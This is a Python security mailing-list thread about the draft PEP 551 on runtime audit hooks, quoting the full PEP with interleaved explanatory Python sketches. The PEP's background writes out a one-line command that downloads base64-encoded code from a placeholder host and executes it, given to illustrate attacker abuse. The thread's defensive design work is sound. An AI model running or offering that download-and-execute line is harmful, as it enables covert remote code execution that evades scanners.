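Logging before raising means that even refused operations leave a record, which matches the priority this PEP gives to detection over prevention.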
>
>
> SPython Entry Point
> ===================
>
> A new entry point binary will be added, called ``spython.exe`` on Windows and
> ``spythonX.Y`` on other platforms. This entry point is intended primarily as
> an example, as we expect most users of this functionality to implement their
> own entry point and hooks (see `Recommendations`_). It will also be used for
> tests.
>
> Source builds will create ``spython`` by default, but distributors may choose
> whether to include ``spython`` in their pre-built packages. The python.org
> managed binary distributions will not include ``spython``.
>
> **Do not accept most command-line arguments**
>
> The ``spython`` entry point requires that a script file be passed as the first
> argument, and does not allow any options. This prevents arbitrary code execution
> from in-memory data or non-script files (such as pickles, which can be executed
> using ``-m pickle <path>``).
>
> Options ``-B`` (do not write bytecode), ``-E`` (ignore environment variables)
> and ``-s`` (no user site) are assumed.
>
> If a file with the same full path as the process with a ``._pth`` suffix
> (``spython._pth`` on Windows, ``spythonX.Y._pth`` on Linux) exists, it will be
> used to initialize ``sys.path`` following the rules currently described `for
> Windows <https://docs.python.org/3/using/windows.html#finding-modules>`_.
>
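To make the ``._pth`` rules more concrete, here is a simplified Python sketch of how an entry point might read such a file. It models only the basic documented Windows rules: one entry per line, relative entries resolved against the file's own directory, blank lines and ``#`` comments ignored, and an ``import site`` line enabling the site module. ``read_pth_file`` is a hypothetical helper, not part of ``spython`` or CPython, and a real entry point would do this in C before initialization.

```python
from pathlib import Path


def read_pth_file(pth_path):
    """Hypothetical helper: return (search_paths, import_site) for a ._pth file.

    Simplified model of the Windows rules: one entry per line, relative
    entries are resolved against the ._pth file's directory, blank lines
    and '#' comments are skipped, and 'import site' enables site.
    """
    base = Path(pth_path).resolve().parent
    paths = []
    import_site = False
    for raw in Path(pth_path).read_text(encoding="utf-8").splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # ignore blank lines and comments
        if line == "import site":
            import_site = True  # the only statement this model accepts
            continue
        # Joining an absolute entry onto base yields the entry itself.
        paths.append(str((base / line).resolve()))
    return paths, import_site
```

Because the file is read only from the executable's own location, an entry point built this way never consults ``PYTHONPATH`` or other environment settings when it builds ``sys.path``.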
> **Log security events to a file**
>
> Before initialization, ``spython`` will set a log hook that writes events to a
> local file. By default, this file is the full path of the process with a
> ``.log`` suffix, but may be overridden with the ``SPYTHONLOG`` environment
> variable (despite such overrides being explicitly discouraged in
> `Recommendations`_).
>
> The log hook will also abort all ``sys.addloghook`` events, preventing any other
> hooks from being added.
>
> On Windows, code from ``compile`` events will be submitted to AMSI [5]_ and if
> it fails to validate, the compile event will be aborted. This can be tested by
> calling ``compile()`` or ``eval()`` on the contents of the `EICAR test file
> <http://www.eicar.org/86-0-Intended-use.html>`_.
>
> **Restrict importable modules**
>
> Also before initialization, ``spython`` will set an open-for-execute hook that
> validates all files opened with ``os.open_for_exec``. This implementation will
> require all files to have a ``.py`` suffix (thereby blocking the use of cached
> bytecode), and will raise a custom log message ``spython.open_for_exec``
> containing ``(filename, True_if_allowed)``.
>
> On Windows, the hook will also open the file with flags that prevent any other
> process from opening it with write access, which allows the hook to perform
> additional validation on the contents with confidence that it will not be
> modified between the check and use. Compilation will later trigger a
> ``compile`` event, so there is no need to read the contents now for AMSI, but
> other validation mechanisms such as DeviceGuard [4]_ should be performed here.
>
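The suffix check described above can be modeled in Python as follows. ``spython_open_for_exec`` and ``log_event`` are hypothetical stand-ins. The real hook is installed from C, and ``log_event`` here only appends the ``spython.open_for_exec`` message to a list rather than raising it through the proposed log hook API. The Windows share-mode flags are not modeled.

```python
import io
import os

# Hypothetical stand-in for the event log: collected (event, args) pairs.
LOGGED = []


def log_event(event, args):
    """Record an event; a real hook would raise it through the log hooks."""
    LOGGED.append((event, args))


def spython_open_for_exec(path):
    """Sketch of spython's open-for-execute hook: only .py sources allowed."""
    filename = os.fspath(path)
    # Requiring the .py suffix blocks cached bytecode (.pyc) and other files.
    allowed = filename.endswith(".py")
    # Log the decision first, whether or not the file is allowed.
    log_event("spython.open_for_exec", (filename, allowed))
    if not allowed:
        raise PermissionError(f"refusing to execute {filename!r}: not a .py file")
    return io.open(filename, "rb")
```

The decision is logged before the exception is raised, so a refused file still leaves a record, in line with the logging advice under `Recommendations`_.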
>
> Performance Impact
> ==================
>
> **TODO**
>
> Full impact analysis still requires investigation. Preliminary testing shows
> that calling ``sys.loghook`` with no hooks added does not significantly affect
> any existing benchmarks, though targeted microbenchmarks can observe an impact.
>
> The performance impact of using ``spython`` or of adding hooks is not of
> interest here, since this is considered opt-in functionality.
>
>
> Recommendations
> ===============
>
> Specific recommendations are difficult to make, as the ideal
> configuration for any environment will depend on the user's ability to
> manage, monitor, and respond to activity on their own network. However,
> many of the proposals here do not appear to be of value without deeper
> illustration. This section provides recommendations using the terms
> **should** (or **should not**), indicating that we consider it dangerous
> to ignore the advice, and **may**, indicating that the advice ought
> to be considered for high value systems. The term **sysadmins** refers
> to whoever is responsible for deploying Python throughout your network,
> though different organizations may have different titles for the
> relevant person.
>
> Sysadmins **should** build their own entry point, likely starting from
> ``spython``, and directly interface with the security systems available
> in their environment. The more tightly integrated, the less likely a
> vulnerability will be found allowing an attacker to bypass those
> systems. In particular, the entry point **should not** obtain any
> settings from the current environment, such as environment variables,
> unless those settings are otherwise protected from modification.
>
> The default ``python`` entry point **should not** be deployed to
> production machines, but could be given to developers to use and test
> Python on non-production machines. Sysadmins **may** consider deploying
> a less restrictive version of their entry point to developer machines,
> since any system connected to your network is a potential target.
>
> Python deployments **should** be made read-only using any available
> platform functionality after deployment and during use.
>
> On platforms that support it, sysadmins **should** include signatures
> for every file in a Python deployment, ideally verified using a private
> certificate. For example, Windows supports embedding signatures in
> executable files and using catalogs for others, and can use DeviceGuard
> [4]_ to validate signatures either automatically or using an
> ``open_for_exec`` hook.
>
> Sysadmins **should** collect as many logged events as possible, and
> **should** copy them off of local machines frequently. Even if logs are
> not being constantly monitored for suspicious activity, once an attack
> is detected it is too late to enable logging. Log hooks **should not**
> attempt to preemptively filter events, as even benign events are useful
> when analyzing the progress of an attack. (Watch the "No Easy Breach"
> video under `Further Reading`_ for a deeper look at this side of things.)
>
> Log hooks **should** write events to logs before attempting to abort. As
> discussed earlier, it is more important to record malicious actions than
> to prevent them. Very few actions should be aborted, as most will occur
> during normal use. Sysadmins **may** audit their Python code and abort
> operations that are known to never be used deliberately.
>
> On production machines, the first log hook **should** be set in C code
> before ``Py_Initialize`` is called, and that hook **should**
> unconditionally abort the ``sys.addloghook`` event. The Python interface
> is mainly useful for testing.
>
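Below is a sketch of a hook that follows these recommendations, written against the ``(event, args)`` hook shape proposed in this PEP. ``LogFirstHook`` and the ``BLOCKED_EVENTS`` set are hypothetical. A production hook would be installed from C before ``Py_Initialize`` and would write to whatever log system the sysadmins have chosen.

```python
import json

# Hypothetical deny list: events this deployment has audited and knows are
# never used deliberately. Everything else is logged but allowed.
BLOCKED_EVENTS = {"sys.addloghook", "ctypes.dlopen"}


class LogFirstHook:
    """Log hook sketch: record every event, then abort a few known-bad ones."""

    def __init__(self, stream):
        self.stream = stream

    def __call__(self, event, args):
        # 1. Write first and without filtering, so the record survives
        #    even if the operation is aborted below.
        record = {"event": event, "args": [repr(a) for a in args]}
        self.stream.write(json.dumps(record) + "\n")
        self.stream.flush()
        # 2. Only then decide whether to abort the operation.
        if event in BLOCKED_EVENTS:
            raise RuntimeError(f"{event} is not permitted")
```

Blocking ``sys.addloghook`` in the first hook prevents any later code from adding hooks, and because the attempt is written to the log first, it is still recorded.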
> On production machines, a non-validating ``open_for_exec`` hook **may**
> be set in C code before ``Py_Initialize`` is called. This prevents later
> code from overriding the hook; however, logging the
> ``setopenforexecutehandler`` event is useful since no code should ever
> need to call it. Using at least the sample ``open_for_exec`` hook
> implementation from ``spython`` is recommended.
>
> [TODO: more good advice; less bad advice]
>
> Further Reading
> ===============
>
>
> **Redefining Malware: When Old Terms Pose New Threats**
>      By Aviv Raff for SecurityWeek, 29th January 2014
>
>      This article, and those linked by it, are high-level summaries of the
>      rise of APTs and the differences from "traditional" malware.
>
>      `<http://www.securityweek.com/redefining-malware-when-old-terms-pose-new-threats>`_
>
> **Anatomy of a Cyber Attack**
>      By FireEye, accessed 23rd August 2017
>
>      A summary of the techniques used by APTs, and links to a number of
>      relevant whitepapers.
>
>      `<https://www.fireeye.com/current-threats/anatomy-of-a-cyber-attack.html>`_
>
> **Automated Traffic Log Analysis: A Must Have for Advanced Threat Protection**
>      By Aviv Raff for SecurityWeek, 8th May 2014
>
>      High-level summary of the value of detailed logging and automatic
>      analysis.
>
>      `<http://www.securityweek.com/automated-traffic-log-analysis-must-have-advanced-threat-protection>`_
>
> **No Easy Breach: Challenges and Lessons Learned from an Epic Investigation**
>      Video presented by Matt Dunwoody and Nick Carr for Mandiant at
>      ShmooCon 2016
>
>      Detailed walkthrough of the processes and tools used in detecting and
>      removing an APT.
>
>      `<https://archive.org/details/No_Easy_Breach>`_
>
> **Disrupting Nation State Hackers**
>      Video presented by Rob Joyce for the NSA at USENIX Enigma 2016
>
>      Good security practices, capabilities and recommendations from the
>      chief of NSA's Tailored Access Operations.
>
>      `<https://www.youtube.com/watch?v=bDJb8WOJYdA>`_
>
> References
> ==========
>
> .. [1] Assume Breach Mindset, `<http://asian-power.com/node/11144>`_
>
> .. [2] PowerShell Loves the Blue Team, also known as Scripting Security and
>     Protection Advances in Windows 10,
>     `<https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/>`_
>
> .. [3] `<https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html>`_
>
> .. [4] `<https://aka.ms/deviceguard>`_
>
> .. [5] AMSI,
>     `<https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587(v=vs.85).aspx>`_
>
> .. [6] Persistent Zone Identifiers,
>     `<https://msdn.microsoft.com/en-us/library/ms537021(v=vs.85).aspx>`_
>
> .. [7] Event tracing,
>     `<https://msdn.microsoft.com/en-us/library/aa363668(v=vs.85).aspx>`_
>
> .. [8] `<https://www.gnupg.org/>`_
>
> .. [9] `<https://www.systutorials.com/docs/linux/man/3-sd_journal_send/>`_
>
> .. [10] `<http://www.trustedbsd.org/openbsm.html>`_
>
> .. [11] `<https://linux.die.net/man/3/syslog>`_
>
> Acknowledgments
> ===============
>
> Thanks to all the people from Microsoft involved in helping make the Python
> runtime safer for production use, and especially to James Powell for doing much
> of the initial research, analysis and implementation, Lee Holmes for invaluable
> insights into the info-sec field and PowerShell's responses, and Brett Cannon
> for the grounding discussions.
>
> Copyright
> =========
>
> Copyright (c) 2017 by Microsoft Corporation. This material may be distributed
> only subject to the terms and conditions set forth in the Open Publication
> License, v1.0 or later (the latest version is presently available at
> http://www.opencontent.org/openpub/).
>
>
>

From steve.dower at python.org  Sat Aug 26 11:42:42 2017
From: steve.dower at python.org (Steve Dower)
Date: Sat, 26 Aug 2017 08:42:42 -0700
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <CAP1=2W43bRebitrQpRbR0U0z2AusGozutDWyaFL1vjD-8UAmyg@mail.gmail.com>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CAP1=2W6Kmjfrkg49hkT8B--cZmO=Nd4W4cvjrrYL8NoJbGuxxw@mail.gmail.com>
 <E1dl4HZ-0007dO-Sb@se2-syd.hostedmail.net.au>
 <CAP1=2W43bRebitrQpRbR0U0z2AusGozutDWyaFL1vjD-8UAmyg@mail.gmail.com>
Message-ID: <E1dldEX-0000N5-EP@se2-syd.hostedmail.net.au>

Forcing people to think about what restrictions they implement (by extending/modifying spython.c) is a feature :)

The idea is that importlib and similar code should just use open_for_exec when they're opening files that will be executed, and let the hook (if any) worry about validating extensions. The overridden function is needed because as you said, there's currently one open call that is used for opening both code and data files, and for data files it should just use regular open(). The override can just be permanently there, since with no hook there's no difference. (And custom subclasses may also need updating, which gets back to "if you don't control the code that's running then none of these protections will protect you" and you have to rely on audit hooks.)

Top-posted from my Windows phone

From: Brett Cannon
Sent: Saturday, August 26, 2017 6:46
To: Steve Dower; security-sig at python.org
Cc: james at dontusethiscode.com; lee.holmes at microsoft.com
Subject: Re: PEP 551: Security transparency in the Python runtime

Is there going to be a visible flag or anything to know you're running a restricted version of Python? If so then a subclass will allow us to override get_code() so that it just skips .pyc files and it can be used automatically when the flag is set. That way users of spython don't have to think about setting that up. Otherwise we could provide a function in importlib._bootstrap that you call during initialization to turn this on.

P.S. sorry to everyone for the slightly scattered comments; doing all of these emails from my phone while in NYC for JupyterCon.
On Thu, Aug 24, 2017, 22:24 Steve Dower <steve.dower at python.org> wrote:
I think overriding get_data in the subclass for source loading is the right approach. Rejecting .pyc files in the hook is easy enough, but for anyone doing proper validation (with a certificate or access control) I'd expect pyc's to fail anyway.

Top-posted from my Windows phone

From: Brett Cannon
Sent: Thursday, August 24, 2017 18:58
To: Steve Dower; security-sig at python.org
Cc: lee.holmes at microsoft.com; james at dontusethiscode.com
Subject: Re: PEP 551: Security transparency in the Python runtime

One point to make about the importlib changes: since the change is currently being made to importlib.abc.FileLoader.get_data(), the default case for reading a non-.py file needs to be to do nothing and allow the read to occur. Otherwise there will be issues with code that uses that method to read data files (which is a legitimate use case). The alternatives are a new subclass of importlib.machinery.SourceFileLoader, where we either document that you can't use get_data() to read arbitrary bytes or restructure get_code() to not use get_data(), or a new API to flag when get_data() should do a verifying open().
There is also the issue of not reading .pyc files, which will have to be addressed either by coming up with a complementary flag to PYTHONDONTWRITEBYTECODE or, once again, by a special subclass where get_code() ignores bytecode completely.

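For reference, the second option above (a SourceFileLoader subclass whose get_code() ignores bytecode) can be sketched using importlib APIs that already exist. SourceOnlyLoader and load_source_only are illustrative names only. The comment marks where a verifying open, such as the proposed open_for_exec, could plug in.

```python
import importlib.machinery
import importlib.util


class SourceOnlyLoader(importlib.machinery.SourceFileLoader):
    """Source loader sketch that never reads or writes cached bytecode."""

    def get_code(self, fullname):
        # SourceLoader.get_code() would look in __pycache__ first and write a
        # new .pyc afterwards; compiling straight from source skips both.
        path = self.get_filename(fullname)
        # A verifying open (such as the proposed open_for_exec) could be
        # plugged in here by overriding get_data() for source files.
        source = self.get_data(path)
        return self.source_to_code(source, path)


def load_source_only(name, path):
    """Import the module at *path* without touching any .pyc files."""
    loader = SourceOnlyLoader(name, path)
    spec = importlib.util.spec_from_file_location(name, path, loader=loader)
    module = importlib.util.module_from_spec(spec)
    loader.exec_module(module)
    return module
```

Because get_data() is still used for the source read, this also matches Steve's suggestion of overriding get_data in the same subclass rather than changing FileLoader for every caller.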
On Thu, 24 Aug 2017 at 13:14 Steve Dower <steve.dower at python.org> wrote:
Hi security-sig,

Those of you who were at the PyCon US language summit this year (or who
saw the coverage at https://lwn.net/Articles/723823/) may recall that I
talked briefly about the ways Python is used by attackers to gain and/or
retain access to systems on local networks.

This comes out of work we've been doing at Microsoft to balance the
flexibility of scripting languages with their usefulness to malicious
users. PowerShell in particular has had a lot of work done, and we've
been doing the same internally for Python. Things like transcripting
(log every piece of code when it is compiled) and signature validation
(prevent loading unsigned code).

This PEP is about upstreaming enough functionality to make it easier to
maintain these features - it is *not* intended to add specific security
features to the core release. The aim is to be able to use a standard
libpython3.7/python37.dll with a custom python3.7/python.exe that adds
those features (listed in the PEP).

Right now parts of the PEP are incomplete. In particular, the
Recommendations section is much shorter than I intend, the list of log
hook locations is also too short, and I have only done a preliminary
performance analysis. But it's time to get reviews of the overall
concept. I'd also like to take suggestions for more hook locations and
relevant recommendations, so feel free to throw them out there. In
particular, I'm not as up to date on best practices for non-Windows
platforms as the rest of the list, so feel free to correct or improve
those parts.

Because ReST+max 80 character width makes tables completely unreadable
in source, I suggest reading it at
https://github.com/python/peps/blob/master/pep-0551.rst but I've
included the full text below for quoting purposes.

My current implementation is available at
https://github.com/zooba/cpython/tree/sectrans and should work on both
Windows and Linux. I hope to take this to python-dev by next week and
spend the dev sprints getting the PEP to the point where it can be accepted.

==========================================================

PEP: 551
Title: Security transparency in the Python runtime
Version: $Revision$
Last-Modified: $Date$
Author: Steve Dower <steve.dower at python.org>
Status: Draft
Type: Standards Track
Content-Type: text/x-rst
Created: 23-Aug-2017
Python-Version: 3.7
Post-History:

Abstract
========

This PEP describes additions to the Python API and specific behaviors for the
CPython implementation that make actions taken by the Python runtime visible to
security and auditing tools. The goals in order of increasing importance are to
prevent malicious use of Python, to detect and report on malicious use, and most
importantly to detect attempts to bypass detection. Most of the responsibility
for implementation falls on users, who must customize and build Python for their
own environment.

We propose two small sets of public APIs to enable users to reliably build their
copy of Python without having to modify the core runtime, protecting future
maintainability. We also discuss recommendations for users to help them develop
and configure their copy of Python.

Background
==========

Software vulnerabilities are generally seen as bugs that enable remote or
elevated code execution. However, in our modern connected world, the more
dangerous vulnerabilities are those that enable advanced persistent threats
(APTs). APTs are achieved when an attacker is able to penetrate a network,
establish their software on one or more machines, and over time extract data or
intelligence. Some APTs may make themselves known by maliciously damaging data
(e.g., `WannaCrypt
<https://www.microsoft.com/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/WannaCrypt>`_)
or hardware (e.g., `Stuxnet
<https://www.microsoft.com/wdsi/threats/malware-encyclopedia-description?name=Win32/Stuxnet>`_).
Most attempt to hide their existence and avoid detection. APTs often use a
combination of traditional vulnerabilities, social engineering, phishing (or
spear-phishing), thorough network analysis, and an understanding of
misconfigured environments to establish themselves and do their work.

The first infected machines may not be the final target and may not require
special privileges. For example, an APT that is established as a
non-administrative user on a developer's machine may have the ability to spread
to production machines through normal deployment channels. It is common for APTs
to persist on as many machines as possible, with sheer weight of presence making
them difficult to remove completely.

Whether an attacker is seeking to cause direct harm or hide their tracks, the
biggest barrier to detection is a lack of insight. System administrators with
large networks rely on distributed logs to understand what their machines are
doing, but logs are often filtered to show only error conditions. APTs that are
attempting to avoid detection will rarely generate errors or abnormal events.
Reviewing normal operation logs involves a significant amount of effort, though
work is underway by a number of companies to enable automatic anomaly detection
within operational logs. The tools preferred by attackers are ones that are
already installed on the target machines, since log messages from these tools
are often expected and ignored in normal use.

At this point, we are not going to spend further time discussing the existence
of APTs or methods and mitigations that do not apply to this PEP. For further
information about the field, we recommend reading or watching the resources
listed under `Further Reading`_.

Python is a particularly interesting tool for attackers due to its prevalence on
server and developer machines, its ability to execute arbitrary code provided as
data (as opposed to native binaries), and its complete lack of internal logging.
This allows attackers to download, decrypt, and execute malicious code with a
single command::

    python -c "import urllib.request, base64;
    exec(base64.b64decode(urllib.request.urlopen('http://my-exploit/py.b64')).decode())"

This command currently bypasses most anti-malware scanners that rely on
recognizable code being read through a network connection or being written to
disk (base64 is often sufficient to bypass these checks). It also bypasses
protections such as file access control lists or permissions (no file access
occurs), approved application lists (assuming Python has been approved for other
uses), and automated auditing or logging (assuming Python is allowed to access
the internet or access another machine on the local network from which to obtain
its payload).

General consensus among the security community is that totally preventing
attacks is infeasible and defenders should assume that they will often detect
attacks only after they have succeeded. This is known as the "assume breach"
mindset. [1]_ In this scenario, protections such as sandboxing and input
validation have already failed, and the important task is detection, tracking,
and eventual removal of the malicious code. To this end, the primary feature
required from Python is security transparency: the ability to see what
operations the Python runtime is performing that may indicate anomalous or
malicious use. Preventing such use is valuable, but secondary to the need to
know that it is occurring.

To summarise the goals in order of increasing importance:

* preventing malicious use is valuable
* detecting malicious use is important
* detecting attempts to bypass detection is critical

One example of a scripting engine that has addressed these challenges is
PowerShell, which has recently been enhanced towards similar goals of
transparency and prevention. [2]_

Generally, application and system configuration will determine which events
within a scripting engine are worth logging. However, given that the value of
many logged events is not recognized until after an attack is detected, it is
important to capture as much as possible and filter views rather than filtering
at the source (see the No Easy Breach video under `Further Reading`_). Events
that are always of interest include attempts to bypass event logging, attempts
to load and execute code that is not correctly signed or access-controlled, use
of uncommon operating system functionality such as debugging or inter-process
inspection tools, most network access and DNS resolution, and attempts to create
and hide files or configuration settings on the local machine.

To summarize, defenders have a need to audit specific uses of Python in order to
detect abnormal or malicious usage. Currently, the Python runtime does not
provide any ability to do this, which (anecdotally) has led to organizations
switching to other languages. The aim of this PEP is to enable system
administrators to deploy a security transparent copy of Python that can
integrate with their existing auditing and protection systems.

On Windows, some specific features that may be enabled by this include:

* Script Block Logging [3]_
* DeviceGuard [4]_
* AMSI [5]_
* Persistent Zone Identifiers [6]_
* Event tracing (which includes event forwarding) [7]_

On Linux, some specific features that may be integrated are:

* gnupg [8]_
* sd_journal [9]_
* OpenBSM [10]_
* syslog [11]_
* check execute bit on imported modules


On macOS, some features that may be used with the expanded APIs are:

* OpenBSM [10]_
* syslog [11]_

Overall, the ability to enable these platform-specific features on production
machines is highly appealing to system administrators and will make Python a
more trustworthy dependency for application developers.


Overview of Changes
===================

True security transparency is not fully achievable by Python in isolation. The
runtime can log as many events as it likes, but unless the logs are reviewed and
analyzed there is no value. Python may impose restrictions in the name of
security, but usability may suffer. Different platforms and environments will
require different implementations of certain security features, and
organizations with the resources to fully customize their runtime should be
encouraged to do so.

The aim of these changes is to enable system administrators to integrate Python
into their existing security systems, without dictating what those systems look
like or how they should behave. We propose two API changes to enable this: an
Event Log Hook and a Verified Open Hook. Neither is set by default, and both
require modifying the appropriate entry point to enable any functionality. For
the purposes of validation and example, we propose a new spython/spython.exe
entry point program that enables some basic functionality using these hooks.
However, the expectation is that security-conscious organizations will create
their own entry points to meet their needs.

Event Log Hook
--------------

In order to achieve security transparency, an API is required to raise messages
from within certain operations. These operations are typically deep within the
Python runtime or standard library, such as dynamic code compilation, module
imports, DNS resolution, or use of certain modules such as ``ctypes``.

The new APIs required for log hooks are::

    # Add a logging hook
    sys.addloghook(hook: Callable[str, tuple]) -> None
    int PySys_AddLogHook(int (*hook)(const char *event, PyObject *args));

    # Raise an event with all logging hooks
    sys.loghook(str, *args) -> None
    int PySys_LogHook(const char *event, PyObject *args);

    # Internal API used during Py_Finalize() - not publicly accessible
    void _Py_ClearLogHooks(void);

Hooks are added by calling ``PySys_AddLogHook()`` from C at any time, including
before ``Py_Initialize()``, or by calling ``sys.addloghook()`` from Python code.
Hooks are never removed or replaced, and existing hooks have an opportunity to
refuse to allow new hooks to be added (adding a logging hook is logged, and so
preexisting hooks can raise an exception to block the new addition).

When events of interest are occurring, code can either call ``PySys_LogHook()``
from C (while the GIL is held) or ``sys.loghook()``. The string argument is the
name of the event, and the tuple contains arguments. A given event name should
have a fixed schema for arguments, and both arguments are considered a public
API (for a given x.y version of Python), and thus should only change between
feature releases with updated documentation.

When an event is logged, each hook is called in the order it was added with the
event name and tuple. If any hook returns with an exception set, later hooks are
ignored and *in general* the Python runtime should terminate. This is
intentional to allow hook implementations to decide how to respond to any
particular event. The typical responses will be to log the event, abort the
operation with an exception, or to immediately terminate the process with an
operating system exit call.

When an event is logged but no hooks have been set, the ``loghook()`` function
should incur minimal overhead. Ideally, each argument is a reference to
existing data rather than a value calculated just for the logging call.

As hooks may be Python objects, they need to be freed during ``Py_Finalize()``.
To do this, we add an internal API ``_Py_ClearLogHooks()`` that releases any
``PyObject*`` hooks that are held, as well as any heap memory used. This is an
internal function with no public export, but it passes an event to all existing
hooks to ensure that unexpected calls are logged.

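The dispatch rules described above can be modeled in pure Python. This is a sketch of the semantics as described, not the proposed ``sys.addloghook()``/``sys.loghook()`` implementation. ``LogHookRegistry`` is a hypothetical class, and its ``clear()`` method stands in for ``_Py_ClearLogHooks()``.

```python
class LogHookRegistry:
    """Pure-Python model of the proposed log hook dispatch rules."""

    def __init__(self):
        self._hooks = []

    def add_hook(self, hook):
        # Adding a hook is itself an event, so existing hooks can veto it
        # by raising; if they do, the new hook is never appended.
        self.log("sys.addloghook", ())
        self._hooks.append(hook)

    def log(self, event, args):
        # Fast path: with no hooks installed, do as little work as possible.
        if not self._hooks:
            return
        # Hooks run in the order they were added; an exception from one hook
        # propagates immediately, so later hooks are not called.
        for hook in self._hooks:
            hook(event, args)

    def clear(self):
        # Stand-in for _Py_ClearLogHooks(): notify every hook, but this
        # event cannot be aborted, so exceptions are swallowed.
        for hook in self._hooks:
            try:
                hook("sys._clearloghooks", ())
            except Exception:
                pass
        self._hooks.clear()
```

In this model, a hook that raises on ``sys.addloghook`` freezes the hook list for the rest of the process. This is the mechanism ``spython`` relies on to block later additions.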
See `Log Hook Locations`_ for proposed log hook points and schemas, and the
`Recommendations`_ section for discussion on appropriate responses.

Verified Open Hook
------------------

Most operating systems have a mechanism to distinguish between files that can be
executed and those that cannot. For example, this may be an execute bit in the
permissions field, or a verified hash of the file contents to detect potential
code tampering. These are an important security mechanism for preventing
execution of data or code that is not approved for a given environment.
Currently, Python has no way to integrate with these when launching scripts or
importing modules.

The new public API for the verified open hook is::

    # Set the handler
    int Py_SetOpenForExecuteHandler(PyObject *(*handler)(const char *narrow, const wchar_t *wide));

    # Open a file using the handler
    os.open_for_exec(pathlike)

The ``os.open_for_exec()`` function is a drop-in replacement for
``open(pathlike, 'rb')``. Its default behaviour is to open a file for raw,
binary access - any more restrictive behaviour requires the use of a custom
handler. (Aside: since ``importlib`` requires access to this function before the
``os`` module has been imported, it will be available on the ``nt``/``posix``
modules, but the intent is that other users will access it through the ``os``
module.)

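The split between default and handler behavior can be modeled as follows. ``set_open_for_exec_handler`` and the module-level handler slot are hypothetical stand-ins for ``Py_SetOpenForExecuteHandler()``. In CPython the handler would be a C function receiving a narrow or wide path, and this model does not log the ``setopenforexecutehandler`` event.

```python
import io
import os

# Hypothetical module-level slot standing in for the C-level handler.
_open_for_exec_handler = None


def set_open_for_exec_handler(handler):
    """Model of Py_SetOpenForExecuteHandler(): install a handler callable."""
    global _open_for_exec_handler
    _open_for_exec_handler = handler


def open_for_exec(pathlike):
    """Model of the proposed os.open_for_exec()."""
    path = os.fspath(pathlike)  # the processed path passed to the handler
    if _open_for_exec_handler is None:
        # Default behavior: equivalent to open(pathlike, 'rb').
        return io.open(path, "rb")
    # With a handler set, its return value is returned directly.
    return _open_for_exec_handler(path)
```

Callers such as ``importlib`` can call ``open_for_exec()`` unconditionally. With no handler installed, the behavior is identical to a plain binary open.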
A custom handler may be set by calling ``Py_SetOpenForExecuteHandler()`` from C
at any time, including before ``Py_Initialize()``. When ``open_for_exec()`` is
called with a handler set, the handler will be passed the processed narrow or
wide path, depending on platform, and its return value will be returned
directly. The returned object should be an open file-like object that supports
reading raw bytes. This is explicitly intended to allow a ``BytesIO`` instance
if the open handler has already had to read the file into memory in order to
perform whatever verification is necessary to determine whether the content is
permitted to be executed.

Note that these handlers can import and call the ``_io.open()`` function on
CPython without triggering themselves.

If the handler determines that the file is not suitable for execution, it should
raise an exception of its choice, as well as performing any other logging or
notifications.

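A handler that reads the file into memory, verifies those exact bytes, and returns a ``BytesIO`` might look like the sketch below. The SHA-256 allowlist is an assumption chosen to keep the example self-contained. Real deployments would more likely check signatures, for example with DeviceGuard [4]_. ``verifying_handler`` and ``APPROVED_SHA256`` are hypothetical names.

```python
import hashlib
import io

# Hypothetical allowlist of SHA-256 hex digests for approved scripts.
APPROVED_SHA256 = set()


def verifying_handler(path):
    """Sketch of an open-for-execute handler that verifies content in memory."""
    # Read once, verify those exact bytes, and hand back the same bytes, so
    # the file cannot change between the check and the use.
    with io.open(path, "rb") as f:
        data = f.read()
    digest = hashlib.sha256(data).hexdigest()
    if digest not in APPROVED_SHA256:
        # Any exception type may be used; it aborts the import or launch.
        raise PermissionError(f"{path!r} is not approved for execution")
    return io.BytesIO(data)
```

Returning the already-verified bytes, rather than reopening the file, closes the window between checking a file and using it.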
All import and execution functionality involving code from a file will be
changed to use ``open_for_exec()`` unconditionally. It is important to note that
calls to ``compile()``, ``exec()`` and ``eval()`` do not go through this
function - a log hook that includes the code from these calls will be added and
is the best opportunity to validate code that is read from the file. Given the
current decoupling between import and execution in Python, most imported code
will go through both ``open_for_exec()`` and the log hook for ``compile``, and
so care should be taken to avoid repeating verification steps.

API Availability
----------------

While all the functions added here are considered public and stable API, the
behavior of the functions is implementation specific. The descriptions here
refer to the CPython implementation, and while other implementations should
provide the functions, there is no requirement that they behave the same.

For example, ``sys.addloghook()`` and ``sys.loghook()`` should exist but may do
nothing. This allows code to make calls to ``sys.loghook()`` without having to
test for existence, but it should not assume that its call will have any effect.
(Including existence tests in security-critical code allows another vector to
bypass logging, so it is preferable that the function always exist.)

``os.open_for_exec()`` should at a minimum always return
``_io.open(pathlike, 'rb')``. Code using the function should make no further
assumptions about what may occur, and implementations other than CPython are not
required to let developers override the behavior of this function with a hook.


Log Hook Locations
==================

Calls to ``sys.loghook()`` or ``PySys_LogHook()`` will be added to the following
operations with the schema in Table 1. Unless otherwise specified, the ability
for log hooks to abort any listed operation should be considered part of the
rationale for including the hook.

.. csv-table:: Table 1: Log Hooks
   :header: "API Function", "Event Name", "Arguments", "Rationale"
   :widths: 2, 2, 3, 6

   ``PySys_AddLogHook``, ``sys.addloghook``, "", "Detect when new log hooks are
   being added."
   ``_PySys_ClearLogHooks``, ``sys._clearloghooks``, "", "Notifies hooks they
   are being cleaned up, mainly in case the event is triggered unexpectedly.
   This event cannot be aborted."
   ``Py_SetOpenForExecuteHandler``, ``setopenforexecutehandler``, "", "Detect
   any attempt to set the ``open_for_execute`` handler."
   "``compile``, ``exec``, ``eval``, ``PyAst_CompileString``", ``compile``, "``(code, filename_or_none)``", "Detect
   dynamic code compilation. Note that this will also be called for regular
   imports of source code, including those that used ``open_for_exec``."
   ``import``, ``import``, "``(module, filename, sys.path, sys.meta_path, sys.path_hooks)``", "Detect
   when modules are imported. This is raised before the module name is
   resolved to a file. All arguments other than the module name may be
   ``None`` if they are not used or available."
   "``_ctypes.dlopen``, ``_ctypes.LoadLibrary``", ``ctypes.dlopen``, "``(module_or_path,)``", "Detect
   when native modules are used."
   ``_ctypes._FuncPtr``, ``ctypes.dlsym``, "``(lib_object, name)``", "Collect
   information about specific symbols retrieved from native modules."
